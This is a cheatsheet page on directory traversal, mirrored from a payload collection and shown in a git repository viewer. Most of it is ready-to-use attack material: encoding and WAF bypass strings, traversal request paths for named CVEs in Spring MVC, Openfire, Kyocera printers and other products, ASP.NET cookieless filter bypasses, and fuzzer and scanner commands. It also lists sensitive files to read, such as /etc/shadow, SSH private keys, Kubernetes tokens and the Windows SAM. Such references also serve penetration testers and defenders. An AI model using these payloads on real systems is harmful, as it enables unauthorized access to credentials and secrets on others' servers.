daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

index.md (13300B)


      1 ---
      2 title: "Directory Traversal"
      3 topic: "Directory Traversal"
      4 topicSlug: "directory-traversal"
      5 sourcePath: "Directory Traversal/README.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Directory%20Traversal/README.md"
      7 sha: "3ac27901c711"
      8 isReadme: true
      9 ---
     10 
     11 # Directory Traversal
     12 
     13 > Path Traversal, also known as Directory Traversal, is a type of security vulnerability that occurs when an attacker manipulates variables that reference files with “dot-dot-slash (../)” sequences or similar constructs. This can allow the attacker to access arbitrary files and directories stored on the file system.
     14 
     15 ## Summary
     16 
     17 * [Tools](#tools)
     18 * [Methodology](#methodology)
     19     * [URL Encoding](#url-encoding)
     20     * [Double URL Encoding](#double-url-encoding)
     21     * [Unicode Encoding](#unicode-encoding)
     22     * [Overlong UTF-8 Unicode Encoding](#overlong-utf-8-unicode-encoding)
     23     * [Mangled Path](#mangled-path)
     24     * [NULL Bytes](#null-bytes)
     25     * [Reverse Proxy URL Implementation](#reverse-proxy-url-implementation)
     26 * [Exploit](#exploit)
     27     * [UNC Share](#unc-share)
     28     * [ASPNET Cookieless](#asp-net-cookieless)
     29     * [IIS Short Name](#iis-short-name)
     30     * [Java URL Protocol](#java-url-protocol)
     31 * [Path Traversal](#path-traversal)
     32     * [Linux Files](#linux-files)
     33     * [Windows Files](#windows-files)
     34 * [Labs](#labs)
     35 * [References](#references)
     36 
     37 ## Tools
     38 
     39 * [wireghoul/dotdotpwn](https://github.com/wireghoul/dotdotpwn) - The Directory Traversal Fuzzer
     40 
     41     ```powershell
     42     perl dotdotpwn.pl -h 10.10.10.10 -m ftp -t 300 -f /etc/shadow -s -q -b
     43     ```
     44 
     45 ## Methodology
     46 
     47 We can use the `..` characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter.
     48 
     49 ```powershell
     50 ../
     51 ..\
     52 ..\/
     53 %2e%2e%2f
     54 %252e%252e%252f
     55 %c0%ae%c0%ae%c0%af
     56 %uff0e%uff0e%u2215
     57 %uff0e%uff0e%u2216
     58 ```
     59 
     60 ### URL Encoding
     61 
     62 | Character | Encoded |
     63 | --------- | ------- |
     64 | `.`       | `%2e`   |
     65 | `/`       | `%2f`   |
     66 | `\`       | `%5c`   |
     67 
     68 **Example:** IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion
     69 
     70 ```ps1
     71 {{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd
     72 ```
     73 
     74 ### Double URL Encoding
     75 
     76 Double URL encoding is the process of applying URL encoding twice to a string. In URL encoding, special characters are replaced with a % followed by their hexadecimal ASCII value. Double encoding repeats this process on the already encoded string.
     77 
     78 | Character | Encoded |
     79 | --------- | ------- |
     80 | `.`       | `%252e` |
     81 | `/`       | `%252f` |
     82 | `\`       | `%255c` |
     83 
     84 **Example:** Spring MVC Directory Traversal Vulnerability (CVE-2018-1271)
     85 
     86 ```ps1
     87 {{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
     88 {{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
     89 ```
     90 
     91 ### Unicode Encoding
     92 
     93 | Character | Encoded  |
     94 | --------- | -------- |
     95 | `.`       | `%u002e` |
     96 | `/`       | `%u2215` |
     97 | `\`       | `%u2216` |
     98 
     99 **Example**: Openfire Administration Console - Authentication Bypass (CVE-2023-32315)
    100 
    101 ```js
    102 {{BaseURL}}/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp
    103 ```
    104 
    105 ### Overlong UTF-8 Unicode Encoding
    106 
    107 The UTF-8 standard mandates that each codepoint is encoded using the minimum number of bytes necessary to represent its significant bits. Any encoding that uses more bytes than required is referred to as "overlong" and is considered invalid under the UTF-8 specification. This rule ensures a one-to-one mapping between codepoints and their valid encodings, guaranteeing that each codepoint has a single, unique representation.
    108 
    109 | Character | Encoded                         |
    110 | --------- | ------------------------------- |
    111 | `.`       | `%c0%2e`, `%e0%40%ae`, `%c0%ae` |
    112 | `/`       | `%c0%af`, `%e0%80%af`, `%c0%2f` |
    113 | `\`       | `%c0%5c`, `%c0%80%5c`           |
    114 
    115 ### Mangled Path
    116 
    117 Sometimes you encounter a WAF which remove the `../` characters from the strings, just duplicate them.
    118 
    119 ```powershell
    120 ..././
    121 ...\.\
    122 ```
    123 
    124 **Example:**: Mirasys DVMS Workstation <=5.12.6
    125 
    126 ```ps1
    127 {{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini
    128 ```
    129 
    130 ### NULL Bytes
    131 
    132 A null byte (`%00`), also known as a null character, is a special control character (0x00) in many programming languages and systems. It is often used as a string terminator in languages like C and C++. In directory traversal attacks, null bytes are used to manipulate or bypass server-side input validation mechanisms.
    133 
    134 **Example:** Homematic CCU3 CVE-2019-9726
    135 
    136 ```js
    137 {{BaseURL}}/.%00./.%00./etc/passwd
    138 ```
    139 
    140 **Example:** Kyocera Printer d-COPIA253MF CVE-2020-23575
    141 
    142 ```js
    143 {{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm
    144 ```
    145 
    146 ### Reverse Proxy URL Implementation
    147 
    148 Nginx treats `/..;/` as a directory while Tomcat treats it as it would treat `/../` which allows us to access arbitrary servlets.
    149 
    150 ```powershell
    151 ..;/
    152 ```
    153 
    154 **Example**: Pascom Cloud Phone System CVE-2021-45967
    155 
    156 A configuration error between NGINX and a backend Tomcat server leads to a path traversal in the Tomcat server, exposing unintended endpoints.
    157 
    158 ```js
    159 {{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}
    160 ```
    161 
    162 ## Exploit
    163 
    164 These exploits affect mechanism linked to specific technologies.
    165 
    166 ### UNC Share
    167 
    168 A UNC (Universal Naming Convention) share is a standard format used to specify the location of resources, such as shared files, directories, or devices, on a network in a platform-independent manner. It is commonly used in Windows environments but is also supported by other operating systems.
    169 
    170 An attacker can inject a **Windows** UNC share (`\\UNC\share\name`) into a software system to potentially redirect access to an unintended location or arbitrary file.
    171 
    172 ```powershell
    173 \\localhost\c$\windows\win.ini
    174 ```
    175 
    176 Also the machine might also authenticate on this remote share, thus sending an NTLM exchange.
    177 
    178 ### ASP NET Cookieless
    179 
    180 When cookieless session state is enabled. Instead of relying on a cookie to identify the session, ASP.NET modifies the URL by embedding the Session ID directly into it.
    181 
    182 For example, a typical URL might be transformed from: `http://example.com/page.aspx` to something like: `http://example.com/(S(lit3py55t21z5v55vlm25s55))/page.aspx`. The value within `(S(...))` is the Session ID.
    183 
    184 | .NET Version | URI                        |
    185 | ------------ | -------------------------- |
    186 | V1.0, V1.1   | /(XXXXXXXX)/               |
    187 | V2.0+        | /(S(XXXXXXXX))/            |
    188 | V2.0+        | /(A(XXXXXXXX)F(YYYYYYYY))/ |
    189 | V2.0+        | ...                        |
    190 
    191 We can use this behavior to bypass filtered URLs.
    192 
    193 * If your application is in the main folder
    194 
    195     ```ps1
    196     /(S(X))/
    197     /(Y(Z))/
    198     /(G(AAA-BBB)D(CCC=DDD)E(0-1))/
    199     /(S(X))/admin/(S(X))/main.aspx
    200     /(S(x))/b/(S(x))in/Navigator.dll
    201     ```
    202 
    203 * If your application is in a subfolder
    204 
    205     ```ps1
    206     /MyApp/(S(X))/
    207     /admin/(S(X))/main.aspx
    208     /admin/Foobar/(S(X))/../(S(X))/main.aspx
    209     ```
    210 
    211 | CVE            | Payload                                        |
    212 | -------------- | ---------------------------------------------- |
    213 | CVE-2023-36899 | /WebForm/(S(X))/prot/(S(X))ected/target1.aspx  |
    214 | -              | /WebForm/(S(X))/b/(S(X))in/target2.aspx        |
    215 | CVE-2023-36560 | /WebForm/pro/(S(X))tected/target1.aspx/(S(X))/ |
    216 | -              | /WebForm/b/(S(X))in/target2.aspx/(S(X))/       |
    217 
    218 ### IIS Short Name
    219 
    220 The IIS Short Name vulnerability exploits a quirk in Microsoft's Internet Information Services (IIS) web server that allows attackers to determine the existence of files or directories with names longer than the 8.3 format (also known as short file names) on a web server.
    221 
    222 * [irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner)
    223 
    224     ```ps1
    225     java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/bin::$INDEX_ALLOCATION/'
    226     java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/MyApp/bin::$INDEX_ALLOCATION/'
    227     ```
    228 
    229 * [bitquark/shortscan](https://github.com/bitquark/shortscan)
    230 
    231     ```ps1
    232     shortscan http://example.org/
    233     ```
    234 
    235 ### Java URL Protocol
    236 
    237 Java's URL protocol when `new URL('')` is used allows the format `url:URL`
    238 
    239 ```powershell
    240 url:file:///etc/passwd
    241 url:http://127.0.0.1:8080
    242 ```
    243 
    244 ## Path Traversal
    245 
    246 ### Linux Files
    247 
    248 * Operating System and Informations
    249 
    250     ```powershell
    251     /etc/issue
    252     /etc/group
    253     /etc/hosts
    254     /etc/motd
    255     ```
    256 
    257 * Processes
    258 
    259     ```ps1
    260     /proc/[0-9]*/fd/[0-9]*   # first number is the PID, second is the filedescriptor
    261     /proc/self/environ
    262     /proc/version
    263     /proc/cmdline
    264     /proc/sched_debug
    265     /proc/mounts
    266     ```
    267 
    268 * Network
    269 
    270     ```ps1
    271     /proc/net/arp
    272     /proc/net/route
    273     /proc/net/tcp
    274     /proc/net/udp
    275     ```
    276 
    277 * Current Path
    278 
    279     ```ps1
    280     /proc/self/cwd/index.php
    281     /proc/self/cwd/main.py
    282     ```
    283 
    284 * Indexing
    285 
    286     ```ps1
    287     /var/lib/mlocate/mlocate.db
    288     /var/lib/plocate/plocate.db
    289     /var/lib/mlocate.db
    290     ```
    291 
    292 * Credentials and history
    293 
    294     ```ps1
    295     /etc/passwd
    296     /etc/shadow
    297     /home/$USER/.bash_history
    298     /home/$USER/.ssh/id_rsa
    299     /etc/mysql/my.cnf
    300     ```
    301 
    302 * Kubernetes
    303 
    304     ```ps1
    305     /run/secrets/kubernetes.io/serviceaccount/token
    306     /run/secrets/kubernetes.io/serviceaccount/namespace
    307     /run/secrets/kubernetes.io/serviceaccount/certificate
    308     /var/run/secrets/kubernetes.io/serviceaccount
    309     ```
    310 
    311 ### Windows Files
    312 
    313 The files `license.rtf` and `win.ini` are consistently present on modern Windows systems, making them a reliable target for testing path traversal vulnerabilities. While their content isn't particularly sensitive or interesting, they serves well as a proof of concept.
    314 
    315 ```powershell
    316 C:\Windows\win.ini
    317 C:\windows\system32\license.rtf
    318 ```
    319 
    320 A list of files / paths to probe when arbitrary files can be read on a Microsoft Windows operating system: [soffensive/windowsblindread](https://github.com/soffensive/windowsblindread)
    321 
    322 ```powershell
    323 c:/inetpub/logs/logfiles
    324 c:/inetpub/wwwroot/global.asa
    325 c:/inetpub/wwwroot/index.asp
    326 c:/inetpub/wwwroot/web.config
    327 c:/sysprep.inf
    328 c:/sysprep.xml
    329 c:/sysprep/sysprep.inf
    330 c:/sysprep/sysprep.xml
    331 c:/system32/inetsrv/metabase.xml
    332 c:/sysprep.inf
    333 c:/sysprep.xml
    334 c:/sysprep/sysprep.inf
    335 c:/sysprep/sysprep.xml
    336 c:/system volume information/wpsettings.dat
    337 c:/system32/inetsrv/metabase.xml
    338 c:/unattend.txt
    339 c:/unattend.xml
    340 c:/unattended.txt
    341 c:/unattended.xml
    342 c:/windows/repair/sam
    343 c:/windows/repair/system
    344 ```
    345 
    346 ## Labs
    347 
    348 * [PortSwigger - File path traversal, simple case](https://portswigger.net/web-security/file-path-traversal/lab-simple)
    349 * [PortSwigger - File path traversal, traversal sequences blocked with absolute path bypass](https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass)
    350 * [PortSwigger - File path traversal, traversal sequences stripped non-recursively](https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively)
    351 * [PortSwigger - File path traversal, traversal sequences stripped with superfluous URL-decode](https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode)
    352 * [PortSwigger - File path traversal, validation of start of path](https://portswigger.net/web-security/file-path-traversal/lab-validate-start-of-path)
    353 * [PortSwigger - File path traversal, validation of file extension with null byte bypass](https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass)
    354 
    355 ## References
    356 
    357 * [Cookieless ASPNET - Soroush Dalili - March 27, 2023](https://web.archive.org/web/20241202163755/https://twitter.com/irsdl/status/1640390106312835072)
    358 * [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://web.archive.org/web/20080115180212/http://cwe.mitre.org:80/data/definitions/40.html)
    359 * [Directory traversal - Portswigger - March 30, 2019](https://web.archive.org/web/20190330191447/https://portswigger.net/web-security/file-path-traversal)
    360 * [Directory traversal attack - Wikipedia - August 5, 2024](https://web.archive.org/web/20111013162219/http://en.wikipedia.org:80/wiki/Directory_traversal_attack)
    361 * [EP 057 | Proc filesystem tricks & locatedb abuse with @_remsio_ & @_bluesheet - TheLaluka - November 30, 2023](https://web.archive.org/web/20240323234120/https://youtu.be/YlZGJ28By8U)
    362 * [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos - June 19, 2018](https://web.archive.org/web/20200919055801/http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html)
    363 * [NGINX may be protecting your applications from traversal attacks without you even knowing - Rotem Bar - September 24, 2020](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&sk=e9ddbadd61576f941be97e111e953381)
    364 * [Path Traversal Cheat Sheet: Windows - @HollyGraceful - May 17, 2015](https://web.archive.org/web/20170123115404/https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/)
    365 * [Understand How the ASP.NET Cookieless Feature Works - Microsoft Documentation - June 24, 2011](https://learn.microsoft.com/en-us/previous-versions/dotnet/articles/aa479315(v=msdn.10))